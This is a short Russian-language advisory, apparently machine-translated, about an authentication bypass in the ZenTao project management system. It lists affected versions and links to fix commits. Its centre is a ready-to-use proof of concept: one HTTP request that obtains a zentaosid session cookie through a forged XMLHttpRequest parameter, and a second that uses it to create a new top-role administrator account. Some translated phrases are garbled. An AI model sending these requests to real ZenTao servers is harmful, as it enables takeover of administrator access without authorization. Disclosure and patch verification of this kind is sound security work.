0x00 Предисловие

ZenTao — это программное обеспечение для управления проектами с открытым исходным кодом, разработанное Qingdao Yiruantianchuang Network Technology Co., Ltd. Оно разработано на основе концепций гибкого управления и управления CMMI и полностью интегрирует управление продуктами, управление проектами, управление качеством, управление документами, организационное управление и управление транзакциями. охватывает основные процессы управления проектами НИОКР.

0x01 Описание уязвимости

В системе управления проектами ZenTao существует уязвимость обхода аутентификации личности. Удаленный злоумышленник может использовать эту уязвимость для обхода аутентификации личности, вызвать любой API-интерфейс, изменить пароль пользователя-администратора и войти в систему как пользователь-администратор.

0x02 номер CVE

никто

0x03 затронутая версия

v16.x<=Дзен Тао< v18.12 (версия с открытым исходным кодом)

v6.x<=Дзен Тао< v8.12 (корпоративная версия)

v3.x<=Дзен Тао< v4.12 (Полное издание)

0x04 Подробности об уязвимости

POC：

Узнайте стоимость Зентаозида

GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
Host: you-ip

‍

Добавить пользователя:

POST /zentao/api.php/v1/users HTTP/1.1
Cookie: zentaosid=xxxxxxxxxx
Host: you-ip

{"account": "zxczxc123", "password": "admin@123", "realname": "zxczxc123", "role": "top", "group": "1"}

Вы также можете войти в систему, если вернете 403.

ссылка на ссылку 0x05

https://github.com/easysoft/zentaopms

https://github.com/easysoft/zentaopms/commit/d13ba70016ca981b08f27e08fb934bf1f23a4135

https://github.com/easysoft/zentaopms/commit/695055c6b1d2e6a8c944bdbc38308c06820c40ce